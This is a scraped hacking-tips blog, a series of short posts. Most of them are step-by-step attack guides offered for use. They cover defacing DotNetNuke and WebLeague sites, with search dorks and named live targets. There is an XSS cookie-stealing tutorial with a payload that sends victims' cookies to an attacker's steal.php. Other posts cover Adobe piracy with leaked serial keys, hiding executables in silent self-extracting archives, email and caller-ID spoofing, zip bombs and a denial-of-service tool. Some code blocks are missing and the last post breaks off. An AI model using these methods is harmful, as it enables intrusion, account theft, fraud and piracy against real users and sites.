Researchers Release tool that can take down Secure Websites

The THC-SSL-DOS tool released on Monday exploits a flaw in SSL(Secure Sockets Layer) renegotiation protocol by flooding the web service with multiple renegotiation requests over a  already established SSL connection for a new key. This works in same way as more common DOS(Denial of service) attacks , except the fact that this flaw in SSL renegotiation takes up more resources than a single HTTP request, hence leading to taking down a large webserver with a single computer.

The tool was released by a group of German Researchers called the Hackers Choice to exploit the flaw in SSL, which is used in many of the secure web services like Email, Banking etc, to transfer secure data across the network between user and a website without interception by a third person.
The Researchers said in a blog post- “We are hoping that the fishy security in SSL does not go unnoticed. The industry should step in to fix the problem so that citizens are safe and secure again. SSL is using an aging method of protecting private data which is complex, unnecessary and not fit for the 21st century,”.
This exploit can allow a single laptop to take down an average server with a greater Bandwidth over a standard DSL connection . It can also take down multiple larger Webservers with few computers. The group claims that the attack would also work on non SSL enabled websites with few modifications on the tool.
For more info-The Hackers Choice
Share:

8 More Important Security Enhancements

1. Check Windows Update and Office Update regularly (http://office.microsoft.com/productupdates); Click on the Automatic Updates tab in the System control panel and choose the appropriate options.
2. Install a personal firewall. Both SyGate (www.sygate.com) and ZoneAlarm (www.zonelabs.com) offer free versions.
3. Install a free spyware blocker. I am choose SpyBot Search & Destroy (http://security.kolla.de). SpyBot is also paranoid and ruthless in hunting out tracking cookies.
4. Block pop-up spam messages by disabling the Windows Messenger service.
Open Control Panel >> Administrative Tools >> Services and you'll see Messenger
Right-click and go to Properties, Set Start-up Type to Disabled and press the Stop button. Bye spam pop-ups!
5. Use strong passwords and change them periodically. Passwords should have at least seven characters; use letters and numbers and have at least one symbol.
undefined
6. If you're using Outlook or Outlook Express, use the current version or one with the Outlook Security Update installed. The update and current versions patch numerous vulnerabilities.
7. Buy antivirus software and keep it up to date. If you're not willing to pay, try AVG Free Edition
8. If you have a wireless network, turn on the security features: Use MAC filtering, turn off SSID broadcast, and even use WEP with the biggest key you can get.
Share:

Security Software That Can Detect And Kill Hidden Trojan Virus And Keylogger

In your system some times many harm full program run like keylogger ,virus and trojan which are hidden and you do not capable to remove it, So today i am going to introduce you with a software which remove all the hidden harm full program from your system and increase the security of your computer system.



Process Revealer

This software launch by LOGIXOFT. Process Revealer is a free security software that can detect and kill hidden processes.
Process Revealer Free Edition is a free hidden process detector that reveals what does not appear in standard detection utilities like Windows Task Manager. Process Revealer provides detailed information about each process running on your computer to help you know if a process is related to a malicious program. Hidden programs are automatically highlighted in the interface and can be removed in one click.
Share:

Cross Site Scripting (XSS)

XSSHello everyone!
Today we are going to cover some basics about a common vulnerability found in web applications.
Due to this, a user (attacker) can inject a (client-side) script into the web page.
Interesting? then…carry on reading..

But, what is Cross-site scripting (XSS) ?
XSS is an attack technique which allows (or rather I should say, “forces”) a web site to execute and display malicious code on a user’s web browser.
The intended victim of an attacker is a user and not the server. The server is a just a host while the malicious code executed is on that user’s (victims’s) web browser.
Attacker uses the server just to perform the attack.
So, what is the exploit code for this kind of attack?
Generally, the code is written in JavaScript (a JavaScript malware?) or it could simply be in HTML, executed on a user’s web browser! (These two are most commonly used)
Let us now try understanding this with an example:
Consider http://xss_vulnerable.com/ is a site vulnerable to XSS attack.
An attacker first needs to identify and locate this vulnerability. After this, he can perform many acts including
  • Account hijacking
  • Cookie stealing
  • Intranet hacking
  • History stealing
  • even..keystroke recording and much more..
They basic idea behind is to make a web server display back the input provided. So, one of the most common vectors for this is via a search box.
_
Here, let me show you a quick example I wrote for this little article:
A simple search box for providing user input and then displaying the results accordingly


Now, what if we replace our input? with a javascript/html code?
Lets try injecting a simple alert box,

And the end result is…

By looking at the source code of the page

we can cleary see, our input was injected into that web page and executed an harmless alert dialog box.
An attacker can now perform much advanced XSS attacks to exploit users (cookie stealing, etc) and spread that link.
Most users fall for this attack as the URL contains the REAL web site domain name.
So, these were some basics about Cross-site scripting (XSS) attack. Hope you all have enjoyed this small post.
Stay tuned for more posts regarding various XSS categories (Non-persistent, persistent and DOM-Based), preventing XSS attacks, etc
Share:

The best 10 Yahoo! Messenger Tricks and Hacks




Yahoo! Messenger is an instant messaging program which is compatible with all Windows versions. While instant messaging is the focus of Yahoo! Messenger, there are several special tricks that can enhance the user experience.

Here are my 10 Best Yahoo! Messenger Tricks and Hacks:

1. Find invisible users on your Yahoo! Messenger list

Want to find out someone who’s hiding from you? You can easily do so by going to Yahoo! Invisible Checker. All you need to do is type in the Yahoo! ID and the particular users status will be revealed.

2. Invisible nickname on chat rooms

Just go to edit profile and in the nick name type a (space character) on it just press Alt 0160 ( or ALT+255 ) and save it.

Now go to any Yahoo! chat room and you’ll notice that your nick name is empty. [Alt+0160 is a keyboard shortcut for space]

3. Run Multiple Instances of Yahoo! Messenger on same system

Some of you might be having more than one Yahoo! ID would like to log in simultaneously. Here is an easy way to do it without installing any sort of software. You just have to edit the registry and voila there you go. Follow the instructions below:
  • Download the following -multiyahoo.reg and save it to your hard disk.
  • Double click on it.


  • The above dialog will popup, click ‘Yes
  • Start the yahoo messenger login with your first ID. Then again start another yahoo messenger by clicking on the messenger icon and log in with your second ID.This tweak works with all versions of Yahoo Messengers.


4. Removing Ads from your Yahoo! Messenger

If you are using Yahoo! Messenger 8.0, then you can disable ads by following the below steps:
  • First close the Yahoo! Messenger.
  • Save this .bat file and execute it. (Note: You won’t be able to enter the chat rooms if you use this patch.)

The above fix doesn’t work for Yahoo! Messenger 9 Beta. Here’s a way to disable the ads in Yahoo! Messenger 9:
  • Make sure the Yahoo! Messenger isn’t running, if it is then just close it.
  • Now backup the following file C:\Program Files\Yahoo!\Messenger\Yahoo!Messenger.exe (create a new copy)
  • Download HxD hex editor.
  • Open C:\Program Files\Yahoo!\Messenger\Yahoo!Messenger.exe in the hex editor
  • Now go to the offset 295928 (in HxD: Search/GoTo)
  • Look at the right column and replace y from “y.m.s.g.r.a.d.s” with p
  • Save the file and close HxD.
Note: This approach breaks Yahoo! Messenger’s terms of service.

If nothing works try launching this file.

5. Yahoo! Smiley Codes

You can make use of all smileys including hidden ones in your messenger by using YEmotePLUS plugin.

6. Creating Custom Profiles for Chat

You can create custom profiles with different name, sex and other details from Yahoo! Create/Edit Profiles. You can use these for chat services only.

7. Change the Yahoo! Messenger Title Bar

You can change the text that appears at the very top of the Yahoo! messenger window by editing the ymsgr.ini file.

1. Go to Program Files\Yahoo!\ and open ymsgr.ini.

2. Then at the end, type this:

[APP TITLE]
caption=YOUR TEXT

3. Change YOUR TEXT to whatever you want it to say. Then save the file and close messenger. When you restart messenger you will see your new message.

8. Online Status Changer and Manager

HyperIM is currently the best status changer & manager for Yahoo! messenger available at present. You can download it here.

9. Access Yahoo! Messenger Chat archives while offline

You can access your Yahoo! chat logs using Yahoo! Message Archive Decoder. It reads Yahoo! Messenger archive files (.dat files) and presents them in a format that you can read. It decodes the message archive without logging in (offline mode and no passwords required). You can download it here.

10. Retrieve Yahoo! Messenger Display pictures

Y! Display Pic will retrieve Yahoo! users even if they are offline or invisible. You can download it here.
Share:

Best 6 proxy Sites to Hide Your Identity

Share:

Hack Adobe Products With Notepad

This very short tutorial or tip that will show you how to hack photoshop or any other adobe software, you will need a serial key that is generated through a keygen or http://www.serials.ws/ when installing, next go to:


C:\Windows\System32\drivers\etc


Do this before installation!

Find a file named "hosts", right click it and "edit" paste this text completely:


# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a "#" symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 3dns-3.adobe.com

127.0.0.1 3dns-2.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 pagead2.googlesyndication.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com


What to do if the "hosts" file is invisible:

* Go to folder options in the control panel and then view hidden folders

Note:-
NEVER register the product or you will most certainly get blocked
 

You May Use These Black Listed Keys




1325-1449-6781-7659-0393-3886
1325-1009-9542-4206-2571-1821
1325-1669-8978-0838-9142-5258
1325-1110-3587-1378-2512-5113
1325-1485-7575-6892-8980-2789
1325-1351-8493-5126-5063-2659
1325-1180-0975-6327-5927-7027
1325-1318-5855-0146-4316-2971
1325-1089-7510-0925-1754-1759
1325-1916-2561-6219-3580-7611
1325-1342-6295-1372-0690-8009
1325-1884-3525-3192-5355-8786
1325-1978-5904-9353-5360-7627
1325-1164-1632-4494-2722-8482
1325-1519-2548-8290-3544-1865
1325-1991-4924-6752-2176-8168
1325-1738-2955-4811-5315-0359
1325-1558-2481-7578-1265-3812
1325-1485-4253-9130-7614-5497
1325-1763-8748-4339-3347-4635
Share:

File Binding Tutorial

In this tutorial I will be showing you (if you do not know already) how to bind two files together using WinRAR.

This is useful if you are sending a file and you want it to extract and run straight away.

For this tutorial I will be using a simple .exe file (command[1].exe) and a game (Grid Wars).

Step 1: 
Get the files you want to bind.

Step 2:

Highlight them both and add to archive.

Step 3:

Change the name and select "Create SFX archive"

Step 4:

Go to the "Advanced" tab at the top and click on "SFX options"

Step 5:

In the "General" tab type in the name of the file you want to run after the extraction.

Step 6:

Go to the "Modes" tab and select "Hide all"

Step 7:

Go to the "Text and icon" tab and change the icon to something other than the WinRAR icon

Step 8:

Click "OK" on the advanced window and "OK" in the main window and it will create the file.

Now when the user clicks on it extracts and automatically runs command[1].exe

This can be used in a variety of ways, you can experiment with the options to get different results.

Enjoy!!!

Sky Is Not The Limit
Share:

Hacking Sites With DNN Very Easy

DNN (DotNetNuke) Gallery All Version Remote File Upload without Authentication

Bug Found by Alireza Afzali From ISCN Team

Date of finding bug : 2008/05/5

Over 10 military website and 20 state of United State of america Defaced by
this bug


Example Of The Hack

Orignal Site 
http://www.raddho.org/

File In The Root 
http://www.raddho.org/portals/0/badman.txt

The Song In Below Video Is Really Funny 
 
So Here Are The Steps :--
 
1st Find The DNN

Go To Any Search Engine

Google

And Search This Dork

:inurl:/tabid/36/language/en-US/Default.aspx

See The Results And Target Any site

You Will See This Part In Every Site That You Searched For

/Home/tabid/36/Language/en-US/Default.aspx

Now Replace This With

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

You Will Enter In The Gallery Page

Now Select

File ( A File On Your Site )

At This Point Cope This Java Script And Paste It In The Address Bar

http://rapidshare.com/files/349733746/js.txt

You Will Find The Upload Option

Select Root And Upload Your File

Your File Then Will Be In The Root

Then Put This In End Of URL

portals/0/yourfile.yourfile format

Your Done Enjoy !!!
 
Share:

Hacking Webleague Sites

1st Open Google

Then Type This Dork " Powered By Webleague " And Search

Select Your Taget Site In A New Page

For Example You Got This Site

http://www.shadowsong.de/WebLeague

Now Add install.php In the End Of The URL And Hit Enter

You Get A New Page

http://www.shadowsong.de/WebLeague/install.php

Enter A New Admin And Password And Submit

Then Type /Admin/index.php In The End And Hit Enter

http://www.shadowsong.de/WebLeague/Admin/index.php

Login With The Admin Account You Created

Go To Settings And Make The Changes

Done!!!

Enjoy!!!
Share:

How to Hack Windows Adminstrator Password Through Linux

With all the good intentions you can think of, name it a tutorial purpose or something to learn purely for the fun and never to harm anyone, I will now show you a simple way to hack a Windows administrator password using Linux. You will only need a Live CD, and for this example, we will utilize Ubuntu.











  1. Install a program called chntpw
    $ sudo apt-get install chntpw
  2.  After successfully installing chntpw, you have to access the Windows NTFS partition by mounting it and allowing read/write support. A good tutorial on how to do this can be found HERE.
  3. After that, use your command line skills by navigating to WINDOWS/system32/config
  4. Once inside the config directory, issue this command:
    $ sudo chntpw SAM
  5. A long display of information will follow. Just ignore them.
  6. Once you are prompted to reset the password, it is recommended to leave the password blank with an asterisk (*).
  7. Reboot, and you can now login to Windows with full administrative access.
Share:

Send Anonymous mails to anyone

Well 1st thing i want to tell you that this post is just for information purpose.
For any misuse the person doing it will be responsible. By this method you may send mail to anyone from any email address/name.

Like you may send mail to anyone from email addres jamesbond@us.gov

There are several fake mailers available on net.
You may even make youself. But here i would like to share a link

http://www.soom.cz/index.php?name=projects/mail/main

By this mailer u may send fake mails to anyone and you may even send with attatchments :)

So why waiting fo. Start pranking your friends
Share:

Call Spoofing

Here is the trick....
just dial -

+239 299328

then wait for a beep after that dial the number you want to display in your friends number with the prefix 91 and then again wait for next beep, after that dial the number which you wanna call … everything done, and call will get connected

or else use this format –
+239 299328 p 919895012345 p 919895000000

here it will display the no: 919895012345
and make call to this no: 919895000000
and hope u know “p
just press star key 3 times “p” will appear
In Iphones … instead of p a comma , is used

NOTE
* To spoof your phone will call an international number , international rates will apply
* Number to call should start with the 91 prefix
* Dialing the spoof no: takes around 20 seconds
* Some one told me that this spoof work for all country’s , i am not sure about that but its working in india
* Even if you try to make miss call you will loose money , since you are dialing an international no:

DISCLAIMER
* Do this at your own risk. I am not responsible for any damage caused
* Just shared with you guys coz sharing is caring.. dont call 100 and say “bomb”
Share:

Packet Sniffing [Hacking a Hacker]

HERE I WILL TELL U HOW CAN U HACK AN HACKER
MOST PEOPLE{HACKERS} FOR ID HACKING USE REMOTE KEYLOGGERS
so I WILL TELL U HOW TO GET THERE PASSWORD USING PACKET SNIFFING

STEP-1
DOWNLOAD BINTEXT FROM HERE{{its a text extraxtor but it also work as a packet sniffer}}
http://www.softpedia.com/progDownload/BinText-Download-138176.html

STEP-2
 RUN IT AND OPEN THE REMOTE KEYLOGGER AND CLICK "GO"
SEE BELOW PICTURE


STEP-3
 NOW WE HAVE TO FIND HIS ID AND PASSWORD
SEE BELOW PIC
AT "WRITE" PLACE WRITE GMAIL OR YAHOO OR @ AND CLICK "FIND"


STEP-4
 VOILAAAAA U GET HIS ID AND PASSWORD OPEN HIS MAIL AND FIND LOST OF PASSWORD AND ID THAT HE HAS STOLEN

STEP-5
 U CAN ALSO FIND LOTS OF PASSWORD BY GOING TO YOUTUBE AND FIND FAKE PROGRAMMS WHICH CONTAIN VIRUS AND SCANNING WITH THIS APP

STEP-6
 U HACKED AN HACKER

THANXX FOR READING


NOTE THIS IS ONLY FOR UNCRYPTED SERVERS FOR STOLING FROM.... CRYPTED ONES IS HARD BUT CAN BE DONE THROUGH SNIFFPASS...
Share:

Find IP Address of Any Website Using A Simple Batch File

Find IP Address Of any Website Using A Batch File...

Just Copy This code below and paste it in notepad
then save it as "anyname.bat"... thts it.. now run it..



Click On Above Image to Enlarge It...

@title IP Finder - Created By BlackCoder & color F1
:Coding
@cls
@echo off & break off & @setlocal enabledelayedexpansion
@echo.
@echo ³³³³³³³³³³³³³³³³³ÉÍÍÍÍÍÍÍÍÍÍÍ»³³³³³³³³³³³³³³³³³
@echo ³³³³³³³³³³³³³³³³³º IP Finder º³³³³³³³³³³³³³³³³³
@echo ³³³³³³³³³³³³³³³³³ÈÍÍÍÍÍÍÍÍÍÍͼ³³³³³³³³³³³³³³³³³
@echo.



@set /p Website=Type Website URL Here :
@for /f "tokens=3" %%Z in ('ping %Website%^| find "["') do (
@for /f "tokens=* delims=" %%J in ("%%Z") do (
@set ip=%%J & @set ip=!ip:[=!
@set ip=!ip:]=! & @set ip_Website=!ip!
)
)
@cls & @echo. & @echo É==========»
@echo ºµ²²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²µ²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²µ²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²µ²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²µ²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²µ²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²µ²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²µ²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²µ²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²²µº & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo ºµ²²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²µ²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²µ²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²µ²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²µ²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²µ²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²µ²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²µ²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²µ²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²²µº & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo ºµ²²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²µ²²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²µ²²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²µ²²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²µ²²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²µ²²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²µ²²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²µ²²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²µ²º & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo É==========»
@echo º²²²²²²²²²µº & @echo È==========¼
@ping localhost -n 1 -w 30000 > nul
@cls & @echo. & @echo Website Address: %Website%
@echo IP Address: %ip_Website% & @echo. & @echo Press { ENTER } to continue...
@pause > nul
goto Coding


Enjoy...
Created By Blackcoder..
Thnx .. plz do comments...
Share:

--: Hacking Technique : Cookie Stealing :--

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).



Why is the cookie so important? Well, first you should see exactly what sort of
information is stored in a cookie. Go to a website that requires a login, and after
logging in erase everything in your address bar and type this line of code:
Code:
jalert(document.cookie)

After you press enter, you should see a pop-up window with some information in it
(that is, if this site uses cookies). This is the data that is stored in your cookie. Here’s an
example of what might be in your cookie:
Code:
username=CyberPhreak; password=ilikepie


This is, of course, a very insecure cookie.

If any sort of vulnerability was found that
allowed for someone to view other people’s cookies, every user account is possibly
compromised.

You’ll be hard-pressed to find a site with cookies like these. However, it
is very common (unfortunately) to find sites with hashes of passwords within the cookie.
The reason that this is unfortunate is because hashes can be cracked, and oftentimes
just knowing the hash is enough.
Now you know why cookies are important; they usually have important information about the
user in them. But how would we go about getting or changing other users’ cookies? This is
the process of cookiestealing.
Cookiestealing is a two-part process. You need to have a script to accept the cookie, and
you need to have a way of sending the cookie to your script. Writing the script to accept
the cookie is the easy part, whereas finding a way to send it to your script is the hard
part. I’ll show you an example of a pHp script that accepts cookies:
Code:

And there you have it, a simple cookiestealer. The way this script works is that it accepts
the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then
saves it to a file called ‘log.txt’. For example:
Code:
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are
going to pass some variables to it, and after that we can set cookie equal to whatever
we want, but what we want to do is set cookie equal to the cookie from the site. This
is the second and harder part of the cookiestealer.
Most websites apply some sort of filter to input, so that you can’t directly insert your
own code. XSS deals with finding exploits within filters, allowing you to put your own
code into a website. This might sound difficult, and in most cases it’s not easy, but
it can be very simple.
Any website that allows you to post text potentially allows you to insert your own code
into the website. Some examples of these types of sites are forums, guestbooks, any site
with a “member profile”, etc.

And any of these sites that have users who log in also
probably use cookies. Now you know what sort of sites might be vulnerable to
cookiestealing.
Let’s assume that we have a website that someone made. This website has user login
capability as well as a guestbook. And let’s also assume that this website doesn’t have
any kind of filtering on what can be put into the guestbook.

This means that you can
put HTML and Javascript directly into your post in the guestbook. I’ll give you an
example of some code that we could put into a guestbook post that would send the user’s
cookie to out script:
Code:

Now whenever someone views the page that you posted this on, they will be redirected to
your script with their cookie from this site in the URL. If you were to look at log.txt
now, you’d see the cookies of whoever looked at that page.
But cookiestealing is never that easy. Let’s assume now that the administrator of this
site got smart, and decided to filter out script tags. Now you code doesn’t work, so
we have to try and evade the filter. In this instance, it’s easy enough:
Code:
void(document.location=’http://yoursite.com/steal.php?cookie=’+
document.cookie)”>Click Me


In this case, when the user clicks on the link they will be sent to your stealer with their
cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters.
Share:

-: The ZIP of Death :-

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly


6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555

Just add some more and the file will expand amazingly

Make sure to not open this after

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz
Share:

Get An Account For Any Site Or Forum !!!

i Friends.

I just came across with a site which gives you usernames and passwords for almost everysite.

I thought of sharing it with you.So,just check it out.I am sure you will love it.

The Site is
http://www.bugmenot.com/

Just enter the address of the forum or any site you want to access and get the pass to enter.
Share:

To convert a .bat or a .vbs file into an executable .exe ..

To convert a .bat or a .vbs file into an executable .exe file without any software
follow the step:-

Step 1
Navigate to C:\Windows\System32 and locate the file named IEXPRESS.EXE

Step 2
Double Click to launch IEXPRESS.EXE or just type & enter iexpress.exe in start>run box.

Step 3
You will be presented with the initial welcome screen and be given two choices. Select “Create new Self Extraction Directive file.” Click Next.

Step 4
Next you will be presented with the Package Purpose screen. For our purposes select “Extract Files and run an installation command” and click the Next button.

Step 5
You will be presented with the Package Title screen, which will give you the opportunity to give your project a name. If you are so inclined give it a meaningful name. If like me you are never going to come back to this, name it whatever you want.

Step 6
You will next be presented with the Confirmation Prompt Screen. We would like the batch file to just be extracted and run so just choose “No Prompt” and click the Next Button.

Step 7
You are presented with the License Agreement window. If you don’t want your users to have to answer a prompt select “Do not display a license.”

Step 8
The Packaged Files window is where you will select your batch file (or .vbs). Click the Add button and browse to your desired file. Then click next.

Step 9
Here you are presented with a window titled Install Program to Launch. Use the drop down control next to “Install Program and choose the only option that will be present, the .bat or .vbs file that you chose in the previous window.

Step 10
The Show Window screen is next. I didn’t want my users to be prompted in any way so I chose Hidden. Click Next.

Step 11
No Finished Message for my users. Select “No message” and choose Next.

Step 12
The Package Name and Options window is where the new .exe specified. Type in a path or browse to the folder you would like your .exe in, type a name in the file name box and click save. Also check the box that says “Hide File Extraction Progress Animation from User.” If you’re worried about long file names go ahead and click the other box as well.

Step 13
Since we really aren’t installing anything we probably want to tell the Configure Restart window to not restart. So choose the option that says “No restart” and hit Next.

Step 14
This window is where you have a chance to save all of the options you have chosen into a project file so that if necessary you may later return and make modifications. I have no need to retain the file, but if you would like to be able to come back to it, by all means choose “Save Self Extraction Directive (SED) file” and tell it where to put it. As always, click Next.

Step 15
Here’s where you’re new .exe is born, on the Create Package screen. Explore to the directory you told it to put the file in, click Next and then watch your little .exe’s first moments as it pops into the big digital world.

Step 16
You’re done! Click finish and go try it out.

Blackcoder
Share:

Change Your IP...

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok

You should now be at an MSDOS prompt screen.

4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"

You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.

8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again

You should now be back to the "Local Area Connection" screen.

15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"
tongue.gif 18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address

do at ur own risk
Blackcoder
Share:

Break Yahoo Account While Chatting....

This is only for education purpose.So who ever try this is at his risk.
I am not sure that this will work 100 %.But yes will work almost 70 percent of the times.But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u havin a problem post here

Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.

2) When we send files yahoo has 2 options

a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files

3) When we use video or audio:-

a) It either goes thru the server
b) Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remeber i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse

1) Its impossible to get a Attackers IP address when you only chat.

2) There are 50 % chances of getting a IP address when you send files

3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances.I will explain only for files here which lies same for Video or audio

1) Go to dos

type ->
netstat -n 3

You will get the following output.Just do not care and be cool
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED

Thats what is highlighted in RED. So what next
3) Hmmm Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id:
NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
SHIV <00> GROUP Registered
SHIV <20> UNIQUE Registered
SHIVCOMP1 <1e> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

Ok so you will ask now what next.No you find what you can do with this network than me explaining everything.



So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
Blackcoder
Share:

Hack Passwords using Limewire...

1. Download LimeWire and install it (Reboot computer if needed)
The newest verion of LimeWire is here:


Code:
http://www.limewire.com/download/index.php

2. Open "Notepad"

3. Copy and Paste the following code into Notepad

